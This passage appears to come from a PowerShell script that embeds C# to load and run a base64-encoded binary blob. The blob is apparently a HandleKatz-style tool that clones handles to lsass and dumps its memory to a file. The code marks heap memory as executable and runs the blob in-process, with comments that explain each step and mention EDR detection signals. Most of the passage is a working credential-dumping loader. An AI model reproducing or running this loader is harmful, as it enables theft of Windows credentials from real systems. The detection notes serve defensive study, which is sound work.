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";
// Turn the base64 literal back into raw bytes.
byte[] buf1 = Convert.FromBase64String(base64Katz);
uint num;
// Copy the bytes into an unmanaged heap allocation. It is not released in the visible code.
IntPtr pointer = Marshal.AllocHGlobal(buf1.Length);
Marshal.Copy(buf1, 0, pointer, buf1.Length);
// 0x40 is PAGE_EXECUTE_READWRITE, so the heap region becomes writable and executable at once.
// The bool result is ignored; num receives the previous protection and is never read.
// Detection note: a private (non-image) region switched to RWX inside the PowerShell host and
// then executed is a pattern that memory scanners and EDR products commonly alert on.
VirtualProtect(pointer, new UIntPtr((uint)buf1.Length), (uint)0x40, out num);
// Wrap the raw address in a delegate so it can be invoked like a managed method.
var func = (HandleDelegate)Marshal.GetDelegateForFunctionPointer(pointer, typeof(HandleDelegate));
// Fixed 0x100-byte unmanaged buffer for the path. The ASCII bytes are copied as they are:
// no terminator is written and the byte count is not compared with 0x100.
// This allocation is not released in the visible code either.
IntPtr StringPointer = Marshal.AllocHGlobal(0x100);
byte[] ByteArray = Encoding.ASCII.GetBytes(path);
Marshal.Copy(ByteArray, 0, StringPointer, ByteArray.Length);
// 512-character buffer handed to the callee; presumably filled with its status text,
// since it is what gets printed below.
StringBuilder output = new StringBuilder(512);
// Runs the blob on the calling thread, in-process: whatever it does is attributed to the
// PowerShell host process in process-level telemetry. The numeric result is stored but unused.
uint result = func(recon, StringPointer, pID, output);
//Console.WriteLine(result);
Console.WriteLine(output);
}
}
}
"@
# Compile the C# source held in the here-string into the current session.
# On Windows PowerShell 5.1 Add-Type does this by launching csc.exe as a child process and
# writing temporary source and assembly files, which gives process-creation and file telemetry
# in addition to script block logging. PowerShell 7 compiles in-process instead.
Add-Type -TypeDefinition $HandleKatzInject -Language CSharp
# Call the freshly compiled static method. $handlePid is a string and is converted to uint here;
# a value that is not a valid unsigned integer raises a conversion error at this line.
[HandleKatzInject.Program]::Inject($recon, $DumpPath, $handlePid)
}